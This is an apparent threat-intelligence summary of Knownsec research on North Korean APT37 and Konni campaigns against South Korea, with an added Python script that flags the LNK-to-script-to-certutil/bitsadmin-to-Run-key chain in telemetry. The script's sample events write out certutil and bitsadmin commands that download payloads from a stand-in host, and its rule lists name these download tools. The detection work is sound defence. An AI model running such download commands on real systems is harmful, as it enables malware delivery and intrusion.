Analysis of Recent Attack Activity by North Korean APT Groups as Large-Scale ROK-US Joint Military Exercises Escalate Provocation
2023-09-12 • Knownsec • Large-scale joint military exercises between South Korea and the United States escalate the provocation. Analysis of recent attacks by North Korean APT organizations
Knownsec 404 researchers observed a sharp rise in North Korean APT activity against South Korean targets during the August 2023 Ulchi Freedom Shield joint exercises. The report says more than 80 samples were captured during the exercises and more than 200 deduplicated samples by early September, with APT37 accounting for most of the activity and LNK or CHM files commonly used as first-stage delivery. It documents APT37's use of oversized LNK packaging and two Chinotto variants, while Konni activity used LNK and CHM lures, VBS and BAT scripts, bitsadmin and certutil, CAB payloads, Run-key persistence, and collection of desktop file lists, IP data, and system information. The authors assess the activity as broad intelligence collection against South Korea, with both APT37 and Konni altering their delivery chains and obfuscation to keep operations running after public disclosures.
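The chain summarised above (a LNK or CHM lure launching a script host, certutil or bitsadmin fetching a CAB, a Run-key entry for persistence, and oversized LNK files as the delivery wrapper) maps onto a handful of endpoint-telemetry checks. The following is an added triage example written for this page; it is not code from the Knownsec report and contains none of its indicators. The events are constructed and shaped like Sysmon process-creation (ID 1) and registry-set (ID 13) records; the 1 MB LNK threshold and the use of `expand.exe` for CAB unpacking are assumptions, since the report names CAB payloads but not the unpacking tool.

```python
"""Triage heuristics for the LNK/CHM -> script host -> LOLBin -> Run-key chain.

Added example, not part of the Knownsec report. All events below are
constructed; field names follow Sysmon Event ID 1 and 13 conventions.
"""
import re
from dataclasses import dataclass

# Download/decode helpers the report names in the Konni chain.
LOLBINS = {"bitsadmin.exe", "certutil.exe"}
# Script hosts a LNK or CHM lure typically launches first.
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "hh.exe", "mshta.exe"}
# Run key used for persistence (matches HKCU/HKU/HKLM variants).
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b", re.I)
# Assumption: a shortcut larger than 1 MB is treated as an oversized LNK wrapper.
LNK_SIZE_THRESHOLD = 1 * 1024 * 1024


@dataclass
class Event:
    event_id: int            # 1 = process create, 13 = registry value set
    image: str = ""
    parent_image: str = ""
    command_line: str = ""
    target_object: str = ""  # registry path for event 13


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage_process(ev: Event) -> list[str]:
    """Flag LOLBin use that fits the lure -> script -> downloader pattern."""
    findings = []
    image, parent, cmd = _basename(ev.image), _basename(ev.parent_image), ev.command_line.lower()
    if image in LOLBINS and parent in SCRIPT_HOSTS:
        findings.append(f"{image} spawned by script host {parent}")
    if image == "certutil.exe" and ("-urlcache" in cmd or "-decode" in cmd):
        findings.append("certutil used for download/decode")
    if image == "bitsadmin.exe" and "/transfer" in cmd:
        findings.append("bitsadmin transfer job")
    if image == "expand.exe" and ".cab" in cmd:   # assumption: CAB unpacked via expand.exe
        findings.append("CAB payload expansion")
    return findings


def triage_registry(ev: Event) -> list[str]:
    """Flag a value written under the Run key."""
    if ev.event_id == 13 and RUN_KEY.search(ev.target_object):
        return [f"Run-key persistence set by {_basename(ev.image)}"]
    return []


def triage_lnk(path: str, size: int) -> list[str]:
    """Flag shortcut files far larger than a normal LNK."""
    if path.lower().endswith(".lnk") and size > LNK_SIZE_THRESHOLD:
        return [f"oversized LNK {path} ({size} bytes)"]
    return []


def triage(events: list[Event], files: list[tuple[str, int]]) -> list[str]:
    findings: list[str] = []
    for ev in events:
        if ev.event_id == 1:
            findings += triage_process(ev)
        elif ev.event_id == 13:
            findings += triage_registry(ev)
    for path, size in files:
        findings += triage_lnk(path, size)
    return findings


# Constructed sample telemetry (no real indicators).
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
          r'cmd.exe /c start "" wscript.exe //e:vbscript %TEMP%\stage.vbs'),
    Event(1, r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\wscript.exe",
          r"certutil.exe -urlcache -split -f http://example.invalid/p.cab %TEMP%\p.cab"),
    Event(1, r"C:\Windows\System32\bitsadmin.exe", r"C:\Windows\System32\cmd.exe",
          r"bitsadmin /transfer j /download /priority high http://example.invalid/x %TEMP%\x"),
    Event(13, r"C:\Windows\System32\reg.exe",
          target_object=r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Update"),
    Event(1, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]
SAMPLE_FILES = [("invite.lnk", 3_000_000), ("readme.lnk", 2048)]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS, SAMPLE_FILES):
        print("ALERT:", finding)
```

Each rule is deliberately narrow so that the benign `notepad.exe` launch and the 2 KB shortcut produce nothing; the value comes from correlating two or more hits on the same host within a short window, which is what the report's chain implies.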